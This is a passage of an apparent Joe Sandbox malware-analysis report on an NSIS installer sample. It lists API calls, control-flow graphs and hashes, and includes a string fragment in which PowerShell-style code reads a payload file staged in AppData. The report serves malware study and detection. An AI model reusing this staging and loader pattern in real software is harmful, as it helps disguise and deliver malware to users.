                                                                                                                                                            • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040357D
                                                                                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 00403616
                                                                                                                                                            • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403653
                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0040365A
                                                                                                                                                            • SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403679
                                                                                                                                                            • GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040368E
                                                                                                                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\87h216Snb7.exe",00000020,"C:\Users\user\Desktop\87h216Snb7.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036C7
                                                                                                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037FF
                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
                                                                                                                                                            • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040381C
                                                                                                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403830
                                                                                                                                                            • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403838
                                                                                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403849
                                                                                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403851
                                                                                                                                                            • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403865
                                                                                                                                                            • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\87h216Snb7.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040393E
                                                                                                                                                              • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                                                                                                                            • wsprintfW.USER32 ref: 0040399B
                                                                                                                                                            • GetFileAttributesW.KERNEL32(0042C800,C:\Users\user~1\AppData\Local\Temp\), ref: 004039CE
                                                                                                                                                            • DeleteFileW.KERNEL32(0042C800), ref: 004039DA
                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\), ref: 00403A08
                                                                                                                                                              • Part of subcall function 00406301: MoveFileExW.KERNEL32(?,?,00000005,00405DFF,?,00000000,000000F1,?,?,?,?,?), ref: 0040630B
                                                                                                                                                            • CopyFileW.KERNEL32(00437800,0042C800,00000001,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00403A1E
                                                                                                                                                              • Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                                                                                                                              • Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                                                                                                                              • Part of subcall function 0040689E: FindFirstFileW.KERNELBASE(771B3420,00425F58,00425710,00405F61,00425710,00425710,00000000,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C6D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 004068A9
                                                                                                                                                              • Part of subcall function 0040689E: FindClose.KERNEL32(00000000), ref: 004068B5
                                                                                                                                                            • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A6C
                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00403A89
                                                                                                                                                            • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403A90
                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AAC
                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AB3
                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AC8
                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403AEB
                                                                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B10
                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00403B33
                                                                                                                                                              • Part of subcall function 00405AEF: CreateDirectoryW.KERNELBASE(?,00000000,0040350F,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                                                                                                            • String ID: "$redeemership=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Torsionsaffjedring.Une';$Tilta$"C:\Users\user\Desktop\87h216Snb7.exe"$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis$C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                                                                                                            • API String ID: 1813718867-4044666877
                                                                                                                                                            • Opcode ID: fe98246c755eeab53da9b3688b78c9a4485cce5d238f6f2650d08d02ed1bb6d0
                                                                                                                                                            • Instruction ID: b6c3ecddbcec298392be70143bc2b9781a35be0696dc4cb4866b7eddd329dddd
                                                                                                                                                            • Opcode Fuzzy Hash: fe98246c755eeab53da9b3688b78c9a4485cce5d238f6f2650d08d02ed1bb6d0
                                                                                                                                                            • Instruction Fuzzy Hash: A9F12370604311ABD720AF659D05B2B7EE8EF8570AF10483EF481B22D1DB7D9A45CB6E

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 151 405705-405720 152 405726-4057ed GetDlgItem * 3 call 4044f5 call 404e4e GetClientRect GetSystemMetrics SendMessageW * 2 151->152 153 4058af-4058b6 151->153 176 40580b-40580e 152->176 177 4057ef-405809 SendMessageW * 2 152->177 155 4058e0-4058ed 153->155 156 4058b8-4058da GetDlgItem CreateThread CloseHandle 153->156 158 40590b-405915 155->158 159 4058ef-4058f5 155->159 156->155 162 405917-40591d 158->162 163 40596b-40596f 158->163 160 405930-405939 call 404527 159->160 161 4058f7-405906 ShowWindow * 2 call 4044f5 159->161 173 40593e-405942 160->173 161->158 166 405945-405955 ShowWindow 162->166 167 40591f-40592b call 404499 162->167 163->160 170 405971-405977 163->170 174 405965-405966 call 404499 166->174 175 405957-405960 call 4055c6 166->175 167->160 170->160 171 405979-40598c SendMessageW 170->171 178 405992-4059bd CreatePopupMenu call 40657e AppendMenuW 171->178 179 405a8e-405a90 171->179 174->163 175->174 180 405810-40581c SendMessageW 176->180 181 40581e-405835 call 4044c0 176->181 177->176 188 4059d2-4059e7 TrackPopupMenu 178->188 189 4059bf-4059cf GetWindowRect 178->189 179->173 180->181 190 405837-40584b ShowWindow 181->190 191 40586b-40588c GetDlgItem SendMessageW 181->191 188->179 192 4059ed-405a04 188->192 189->188 193 40585a 190->193 194 40584d-405858 ShowWindow 190->194 191->179 195 405892-4058aa SendMessageW * 2 191->195 196 405a09-405a24 SendMessageW 192->196 197 405860-405866 call 4044f5 193->197 194->197 195->179 196->196 198 405a26-405a49 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 196->198 197->191 200 405a4b-405a72 SendMessageW 198->200 200->200 201 405a74-405a88 GlobalUnlock SetClipboardData CloseClipboard 200->201 201->179
                                                                                                                                                            APIs
                                                                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 00405763
                                                                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405772
                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 004057AF
                                                                                                                                                            • GetSystemMetrics.USER32(00000002), ref: 004057B6
                                                                                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057D7
                                                                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057E8
                                                                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057FB
                                                                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405809
                                                                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040581C
                                                                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040583E
                                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405852
                                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405873
                                                                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405883
                                                                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040589C
                                                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058A8
                                                                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405781
                                                                                                                                                              • Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004058C5
                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00005699,00000000), ref: 004058D3
                                                                                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 004058DA
                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 004058FE
                                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405903
                                                                                                                                                            • ShowWindow.USER32(00000008), ref: 0040594D
                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405981
                                                                                                                                                            • CreatePopupMenu.USER32 ref: 00405992
                                                                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059A6
                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004059C6
                                                                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059DF
                                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A17
                                                                                                                                                            • OpenClipboard.USER32(00000000), ref: 00405A27
                                                                                                                                                            • EmptyClipboard.USER32 ref: 00405A2D
                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A39
                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405A43
                                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A57
                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405A77
                                                                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405A82
                                                                                                                                                            • CloseClipboard.USER32 ref: 00405A88
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                            • String ID: {
                                                                                                                                                            • API String ID: 590372296-366298937
                                                                                                                                                            • Opcode ID: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
                                                                                                                                                            • Instruction ID: 1ec4b4c3d0988b91a44b02e8c0f1a80d5eff4bd371306251f5288e66bb296ab7
                                                                                                                                                            • Opcode Fuzzy Hash: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
                                                                                                                                                            • Instruction Fuzzy Hash: 4FB139B1900608FFDB11AFA0DD89AAE7B79FB04354F40813AFA41B61A0CB744E51DF68

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 509 405c4d-405c73 call 405f18 512 405c75-405c87 DeleteFileW 509->512 513 405c8c-405c93 509->513 514 405e09-405e0d 512->514 515 405c95-405c97 513->515 516 405ca6-405cb6 call 406541 513->516 518 405db7-405dbc 515->518 519 405c9d-405ca0 515->519 522 405cc5-405cc6 call 405e5c 516->522 523 405cb8-405cc3 lstrcatW 516->523 518->514 521 405dbe-405dc1 518->521 519->516 519->518 524 405dc3-405dc9 521->524 525 405dcb-405dd3 call 40689e 521->525 526 405ccb-405ccf 522->526 523->526 524->514 525->514 533 405dd5-405de9 call 405e10 call 405c05 525->533 529 405cd1-405cd9 526->529 530 405cdb-405ce1 lstrcatW 526->530 529->530 532 405ce6-405d02 lstrlenW FindFirstFileW 529->532 530->532 534 405d08-405d10 532->534 535 405dac-405db0 532->535 551 405e01-405e04 call 4055c6 533->551 552 405deb-405dee 533->552 538 405d30-405d44 call 406541 534->538 539 405d12-405d1a 534->539 535->518 537 405db2 535->537 537->518 549 405d46-405d4e 538->549 550 405d5b-405d66 call 405c05 538->550 541 405d1c-405d24 539->541 542 405d8f-405d9f FindNextFileW 539->542 541->538 546 405d26-405d2e 541->546 542->534 545 405da5-405da6 FindClose 542->545 545->535 546->538 546->542 549->542 554 405d50-405d59 call 405c4d 549->554 562 405d87-405d8a call 4055c6 550->562 563 405d68-405d6b 550->563 551->514 552->524 553 405df0-405dff call 4055c6 call 406301 552->553 553->514 554->542 562->542 565 405d6d-405d7d call 4055c6 call 406301 563->565 566 405d7f-405d85 563->566 565->542 566->542
                                                                                                                                                            APIs
                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\87h216Snb7.exe"), ref: 00405C76
                                                                                                                                                            • lstrcatW.KERNEL32(00424F10,\*.*,00424F10,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\87h216Snb7.exe"), ref: 00405CBE
                                                                                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00424F10,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\87h216Snb7.exe"), ref: 00405CE1
                                                                                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\87h216Snb7.exe"), ref: 00405CE7
                                                                                                                                                            • FindFirstFileW.KERNELBASE(00424F10,?,?,?,0040A014,?,00424F10,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\87h216Snb7.exe"), ref: 00405CF7
                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D97
                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00405DA6
                                                                                                                                                            Strings
                                                                                                                                                            • "C:\Users\user\Desktop\87h216Snb7.exe", xrefs: 00405C56
                                                                                                                                                            • \*.*, xrefs: 00405CB8
                                                                                                                                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405C5A
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                            • String ID: "C:\Users\user\Desktop\87h216Snb7.exe"$C:\Users\user~1\AppData\Local\Temp\$\*.*
                                                                                                                                                            • API String ID: 2035342205-3947366890
                                                                                                                                                            • Opcode ID: 0b85f367639a69f5b614f98777155fba44d4349fb39831c7af8fd38ecdabae30
                                                                                                                                                            • Instruction ID: c1737a7785d2a2f908f5f44de07c4aee1227101a85bdbc8c56ed50a571596083
                                                                                                                                                            • Opcode Fuzzy Hash: 0b85f367639a69f5b614f98777155fba44d4349fb39831c7af8fd38ecdabae30
                                                                                                                                                            • Instruction Fuzzy Hash: 3241C430800A14BADB216B65CD4DABF7678DF41758F14813BF802B21D1D77C4AC19EAE

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 757 406c5f-406c64 758 406cd5-406cf3 757->758 759 406c66-406c95 757->759 760 4072cb-4072e0 758->760 761 406c97-406c9a 759->761 762 406c9c-406ca0 759->762 763 4072e2-4072f8 760->763 764 4072fa-407310 760->764 765 406cac-406caf 761->765 766 406ca2-406ca6 762->766 767 406ca8 762->767 770 407313-40731a 763->770 764->770 768 406cb1-406cba 765->768 769 406ccd-406cd0 765->769 766->765 767->765 771 406cbc 768->771 772 406cbf-406ccb 768->772 773 406ea2-406ec0 769->773 774 407341-40734d 770->774 775 40731c-407320 770->775 771->772 776 406d35-406d63 772->776 780 406ec2-406ed6 773->780 781 406ed8-406eea 773->781 783 406ae3-406aec 774->783 777 407326-40733e 775->777 778 4074cf-4074d9 775->778 784 406d65-406d7d 776->784 785 406d7f-406d99 776->785 777->774 786 4074e5-4074f8 778->786 782 406eed-406ef7 780->782 781->782 787 406ef9 782->787 788 406e9a-406ea0 782->788 789 406af2 783->789 790 4074fa 783->790 791 406d9c-406da6 784->791 785->791 792 4074fd-407501 786->792 808 407481-40748b 787->808 809 406e7f-406e97 787->809 788->773 798 406e3e-406e48 788->798 794 406af9-406afd 789->794 795 406c39-406c5a 789->795 796 406b9e-406ba2 789->796 797 406c0e-406c12 789->797 790->792 799 406dac 791->799 800 406d1d-406d23 791->800 794->786 801 406b03-406b10 794->801 795->760 810 406ba8-406bc1 796->810 811 40744e-407458 796->811 802 406c18-406c2c 797->802 803 40745d-407467 797->803 804 40748d-407497 798->804 805 406e4e-407017 798->805 817 406d02-406d1a 799->817 818 407469-407473 799->818 806 406dd6-406ddc 800->806 807 406d29-406d2f 800->807 801->790 816 406b16-406b5c 801->816 819 406c2f-406c37 802->819 803->786 804->786 805->783 814 406e3a 806->814 815 406dde-406dfc 806->815 807->776 807->814 808->786 809->788 813 406bc4-406bc8 810->813 811->786 813->796 821 406bca-406bd0 813->821 814->798 822 406e14-406e26 815->822 823 406dfe-406e12 815->823 824 406b84-406b86 816->824 825 406b5e-406b62 816->825 817->800 818->786 819->795 819->797 826 406bd2-406bd9 821->826 827 406bfa-406c0c 821->827 828 406e29-406e33 822->828 823->828 831 406b94-406b9c 824->831 832 406b88-406b92 824->832 829 406b64-406b67 GlobalFree 825->829 830 406b6d-406b7b GlobalAlloc 825->830 833 406be4-406bf4 GlobalAlloc 826->833 834 406bdb-406bde GlobalFree 826->834 827->819 828->806 835 406e35 828->835 829->830 830->790 836 406b81 830->836 831->813 832->831 832->832 833->790 833->827 834->833 838 407475-40747f 835->838 839 406dbb-406dd3 835->839 836->824 838->786 839->806
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
                                                                                                                                                            • Instruction ID: db5d81fcbfa5be4a2d8af1487b95e9640f9c883cb1993a3fcb30b22963867ec5
                                                                                                                                                            • Opcode Fuzzy Hash: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
                                                                                                                                                            • Instruction Fuzzy Hash: 87F17871D04229CBDF28CFA8C8946ADBBB0FF44305F25816ED456BB281D7786A86CF45
                                                                                                                                                            APIs
                                                                                                                                                            • FindFirstFileW.KERNELBASE(771B3420,00425F58,00425710,00405F61,00425710,00425710,00000000,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C6D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 004068A9
                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004068B5
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                            • String ID: X_B
                                                                                                                                                            • API String ID: 2295610775-941606717
                                                                                                                                                            • Opcode ID: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                                                                                                            • Instruction ID: f67f359cedd367be1f2f51a398ada2a6aadcf11014009cc1af4821528039bb17
                                                                                                                                                            • Opcode Fuzzy Hash: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                                                                                                            • Instruction Fuzzy Hash: 68D0123251A5205BC64067396E0C84B7B58AF153717268A36F5AAF21E0CB348C6A969C
                                                                                                                                                            APIs
                                                                                                                                                            • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040224E
                                                                                                                                                            Strings
                                                                                                                                                            • C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde, xrefs: 0040228E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
